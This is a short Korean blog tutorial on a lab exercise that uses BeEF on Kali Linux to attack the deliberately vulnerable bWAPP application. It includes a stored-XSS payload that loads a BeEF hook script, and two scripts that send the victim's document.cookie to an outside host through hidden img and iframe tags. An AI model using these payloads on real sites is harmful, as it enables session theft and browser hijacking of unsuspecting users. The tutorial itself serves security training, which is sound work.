min8282

BeEF 활용 악성코드 공격(1) 본문

Security/Application

BeEF 활용 악성코드 공격(1)

min8282 2025. 2. 18. 18:07

1. 가상 머신 설정

실습을 위해 윈도우와 칼리 리눅스 가상 머신을 설정한다.

  • 윈도우 설정
    • 메모리: 2GB
    • 프로세서: 2개
    • 네트워크: NAT 설정
    • 절전 모드: 사용 안 함
    • 윈도우 업데이트: 사용 안 함


2. 칼리 리눅스 환경 설정

BeEF 설치 및 실행을 위해 칼리 리눅스에서 아래 명령어를 실행한다.

sudo apt update 

sudo apt install beef-xss 

sudo beef-xss
  • BeEF 첫 실행 시 비밀번호 설정 (예: 1234)
  • 브라우저에서 http://127.0.0.1:3000/ui/panel로 접속하여 BeEF 패널에 들어간다.
  • BeEF 훅 URL: http://192.168.183.129:3000/hook.js


3. bWAPP 게시판 악성코드 삽입

<script src="http://192.168.183.129:3000/hook.js"></script>

bWAPP의 XSS-Stored(Blog)에 위와 같이 스크립트를 작성하여 악성코드를 삽입한다.


*추가로 클라이언트의 쿠키 정보를 외부로 전송하거나, iframe을 사용한 악성 코드 삽입을 아래와 같은 스크립트로 진행할 수 있다.

<script> document.write("<img src='http://192.168.20.131/cookie.php?cookie="+document.cookie+"'>") </script>

<script> document.write("<iframe src='http://192.168.20.131/cookie.php?cookie="+document.cookie+"' width=0 height=0></iframe>") </script>

4. BeEF 패널에서 클라이언트 메시지 보내기

BeEF 패널로 접속하면(http://127.0.0.1:3000/ui/panel) 왼쪽 온라인 브라우저 목록에 현재 접속한 브라우저의 정보가 나타나게 된다. 

 

BeEF 패널에서 다양한 기능을 실행할 수 있다. 지금은 Alert 메시지를 보내볼 것이다.

BeEF 패널에서 Commands>Create Alert Dialog 선택 후 원하는 메시지를 입력하고 실행시키면

클라이언트 브라우저에 위와 같이 메시지가 출력된다.